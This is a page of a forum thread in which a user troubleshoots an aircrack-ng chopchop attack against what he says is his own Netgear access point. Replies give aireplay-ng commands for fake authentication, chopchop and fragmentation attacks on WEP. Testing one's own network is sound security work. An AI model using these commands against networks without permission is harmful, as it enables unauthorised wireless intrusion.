Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: [SOLVED]Need help on chopchop attack

  1. #1
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default [SOLVED]Need help on chopchop attack

    Greetings every1,

    after i seen the videos from xploitz i tried myself with a chop chop attack on my AP NETGEAR WG602v4 using a USB card Asus WG167L driver in use are rt73 ... tested aireplay-ng --test -B rausb0 is workin on but wheni goin to use aireplay-ng -4 (chopchop) gettin this

    Offset 41 (81% done) | xor = A6 | pt = 09 | 46 frames written in 138ms
    Offset 40 (84% done) | xor = C0 | pt = 6C | 250 frames written in 749ms
    Sent 966 packets, current guess: C2...

    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    This doesn't look like an IP packet, try another one.

    Warning: ICV checksum verification FAILED! Trying workaround.


    The AP appears to drop packets shorter than 40 bytes.
    Enabling standard workaround: IP header re-creation.
    This doesn't look like an IP packet, try another one.

    Workaround couldn't fix ICV checksum.
    Packet is most likely invalid/useless
    Try another one.

    Saving plaintext in replay_dec-1010-210809.cap
    Saving keystream in replay_dec-1010-210809.xor

    Completed in 19s (2.11 bytes/s)

    tryin to figure what im not doin correctly

  2. #2
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    Did you installed the driver? Correctly?

    w w w .aircrack-ng.org/doku.php?id=rt73


    What comand-line are you using?

  3. #3
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Im usin the ASPJ 1.1.0 driver for RT73,

    usin the followin line

    aireplay-ng -4 -h aa:aa:aa:aa:aa:aa -b (AP MAC) rausb0

    while im runnin the fake authentication in the other windows

    aireplay-ng -1 20 -a (AP MAC) -h (FAKE MAC) rausb0

  4. #4
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    You don't need to run fake auth at the same time.

    Run fake auth once, like this:


    aireplay-ng -1 0 -a (AP MAC) -h (FAKE MAC) rausb0




    Did you restrict the AP channel?

    airmon-ng start rausb0 (CHANNEL)



    Does fake auth has success?

  5. #5
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    try this aireplay-ng --chopchop -m 68 -n 256 ...........................

    -m 68 specifies minimum packet size
    -n maximum packet size .....

    if you are using 1.0 add -F , you won't need to select packets, it will be autoselected.....

    are you sure you are on the right channel ?

    have you lower your rate to 1M ?
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  6. #6
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    did the test again with make sure im on channel 10 the same of my AP and lowered the rate to 1M ..in order i do

    ifconfig rausb0 down
    airmon-ng stop rausb0
    then
    ifconfig rausb0 up
    airmon-ng start rausb0 10
    iwconfig rausb0 rate 1

    then in windows n1 runnin airodump-ng -c 10 -w file rausb0

    windows n2 doin aireplay-ng -1 0 -a (AP MAC) -h (FAKE MAC CLIENT) rausb0

    then aireplay-ng -4 -F -h (FAKE MAC CLIENT) -b (AP MAC) rausb0


    im runnin BT on HD installation with the last aircrack-ng beta 1.0 r784 downloaded and installed thk to your utilities shaman

    did the test and gettin the same error.

  7. #7
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Updated the driver with ASPJ 2.0.0 did the test but still nothin gettin like the same error...

  8. #8
    Just burned his ISO
    Join Date
    Oct 2007
    Posts
    17

    Default

    Don't airodump while you chopchop, why are you doing this?

    Get the mac address, use fake auth, then chopchop, then packetforge and aireplay with airodump.

    You don't need to keep airodump running.

  9. #9
    Junior Member
    Join Date
    Aug 2007
    Posts
    63

    Default

    Quote Originally Posted by throat View Post
    Don't airodump while you chopchop, why are you doing this?

    Get the mac address, use fake auth, then chopchop, then packetforge and aireplay with airodump.

    You don't need to keep airodump running.
    Tried also do not run airodump-ng meanwhile i use fake auth and when i use other command but looks like the problem persist...actually i will goin to try with a different AP .. prolly for some reason chopchop attack is possible only on some AP and mine is not on that list...

    any other ideas are pretty welcome

  10. #10
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    try -5 attack instead .....

    (fragmentation)

    the ICV message means that chopchop attack will failed with this AP
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •